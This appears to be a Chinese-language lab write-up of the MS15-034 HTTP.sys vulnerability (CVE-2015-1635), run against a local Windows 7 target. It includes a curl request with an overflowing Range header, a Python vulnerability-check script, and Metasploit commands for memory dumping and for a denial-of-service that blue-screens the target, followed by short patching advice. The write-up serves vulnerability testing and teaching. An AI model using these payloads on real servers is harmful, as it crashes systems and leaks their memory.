赞
踩
在2015年4月安全补丁日,微软发布的众多安全更新中,修复了HTTP.sys中一处允许远程执行代码漏洞,编号为:CVE-2015-1635(MS15-034 )。利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。根据公告显示,该漏洞对服务器系统造成了不小的影响,主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。
环境搭建:
靶机: win7(192.168.80.130)
攻击机: kali(192.168.80.129)
(1)使用curl工具进行测试,测试命令:
curl http://192.168.80.130 -H “Host: 192.168.80.130” -H “Range: bytes=0-18446744073709551615”
测试结果截图:
(2)使用POC测试,代码为:
import socket import random ipAddr = "192.168.80.130" # 漏洞主机ip或域名 hexAllFfff = "18446744073709551615" req1 = "GET / HTTP/1.0\r\n\r\n" req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n" print("[*] Audit Started") client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client_socket.connect((ipAddr, 80)) client_socket.send(req1.encode()) boringResp = client_socket.recv(1024).decode() if "Microsoft" not in boringResp: print("[*] Not IIS") exit(0) client_socket.close() client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) client_socket.connect((ipAddr, 80)) client_socket.send(req.encode()) goodResp = client_socket.recv(1024).decode() if "Requested Range Not Satisfiable" in goodResp: print("[!!] Looks VULN") elif " The request has an invalid header name" in goodResp: print("[*] Looks Patched") else: print("[*] Unexpected response, cannot discern patch status")
测试结果截图:
借助metasploit平台,截图如下:
use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
set rhosts 192.168.80.130
run
同样借助metasploit平台,截图如下:
use auxiliary/dos/http/ms15_034_ulonglongadd
set rhosts 192.168.80.130
set threads 10
run
攻击开始后,win7瞬间蓝屏然后自动重启,截图如下:
禁用IIS内核缓存(可能降低IIS性能)
可能不行,最好的方式还是打官方补丁
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。